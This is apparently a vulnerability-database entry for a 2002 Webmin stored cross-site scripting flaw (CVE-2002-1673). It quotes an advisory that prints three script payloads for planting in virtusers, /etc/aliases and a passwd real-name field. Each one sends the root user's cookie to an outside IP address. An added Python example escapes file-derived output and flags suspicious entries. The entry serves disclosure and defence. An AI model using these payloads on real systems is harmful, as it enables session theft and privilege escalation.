Webmin Script Code Input Validation Vulnerability

Vulnerability ID: 1106648
Vulnerability type: Input validation
Published: 2002-03-20
Updated: 2005-10-20
CVE ID: CVE-2002-1673
CNNVD-ID: CNNVD-200212-191
Platform: Linux
CVSS score: 3.6
|Vulnerability source
https://www.exploit-db.com/exploits/21348
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-191
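|Vulnerability details
Webmin is a web-based administration program for Unix and Linux operating systems. Webmin does not adequately filter script code from output displayed in the web interface, which can lead to malicious script code being executed. Output taken from some system files and similar sources is shown in the web interface without sufficient filtering, so an attacker can modify the contents of these files and have the code executed when the root user views them. In addition, an attacker can insert malicious JavaScript code into other types of output; when the root user browses the link, the script code executes in the root user's browser and leaks sensitive cookie-based authentication information.
|Exploit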
source: http://www.securityfocus.com/bid/4329/info

Webmin is a web-based interface for system administration of Unix and Linux operating systems.

Webmin does not filter script code from output that may be displayed by the web interface, such as log files, etc. This may enable a local attacker, with write privileges to such files, to cause arbitrary script code to be executed by the root user. Additionally, an attacker who can contrive a way to inject malicious script code into other types of output displayed by the Webmin interface may also exploit this issue.

This may enable the attacker to steal cookie-based authentication credentials from the root user, eventually resulting in an escalation of privileges for the local attacker. 

Insert the following line into the virtusers file, and wait for the root user to visit that page:
</tt></a></td><tt><td><script>/* */document.write('<img
src="http://192.168.40.1/'+document.cookie+'">');</script>

Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
*/+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>

Potentially more likely to be exploited however, would be a malicious local user who has _no_ access to webmin, who could change a file that webmin views through the HTML interface (where the code being read in is not checked for HTML). An example would be changing their 'real name' in /etc/passwd to be something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, but you get the idea.)
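
The missing control described above is output encoding of file-derived values at render time. The following is an added example, not Webmin's code and not part of the original advisory; it is written in Python rather than Webmin's Perl, and the function names and the sample passwd data are hypothetical and constructed.

```python
import html
import re

# Audit pattern: angle brackets have no business in a GECOS ("real name") field.
# '&' and "'" are left out of the audit because they occur in legitimate names,
# but they are still escaped when rendering.
MARKUP = re.compile(r"[<>]")

def parse_passwd(text):
    """Yield (username, gecos) from passwd(5)-format text, skipping malformed lines."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7:
            yield fields[0], fields[4]

def render_rows(entries):
    """Build table rows, HTML-escaping every file-derived value at output time."""
    return "\n".join(
        "<tr><td><tt>{}</tt></td><td>{}</td></tr>".format(
            html.escape(user, quote=True), html.escape(gecos, quote=True))
        for user, gecos in entries)

def suspicious_entries(entries):
    """Return usernames whose GECOS field contains markup characters."""
    return [user for user, gecos in entries if MARKUP.search(gecos)]

# Constructed sample input (not taken from a real system).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000:Alice O'Brien:/home/alice:/bin/bash\n"
    "mallory:x:1001:1001:</td><script>probe()</script>:/home/mallory:/bin/sh\n"
)

if __name__ == "__main__":
    entries = list(parse_passwd(SAMPLE_PASSWD))
    print(render_rows(entries))          # markup arrives as inert text
    print("flag for review:", suspicious_entries(entries))
```

Escaping at the point of output covers every file the interface displays (virtusers, /etc/aliases, /etc/passwd, logs), while the audit function only helps find entries that were already tampered with.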
|References

Source: XF
Name: webmin-functions-execute-code(8596)
Link: http://xforce.iss.net/xforce/xfdb/8596
Source: BID
Name: 4329
Link: http://www.securityfocus.com/bid/4329
Source: NSFOCUS
Name: 2468
Link: http://www.nsfocus.net/vulndb/2468
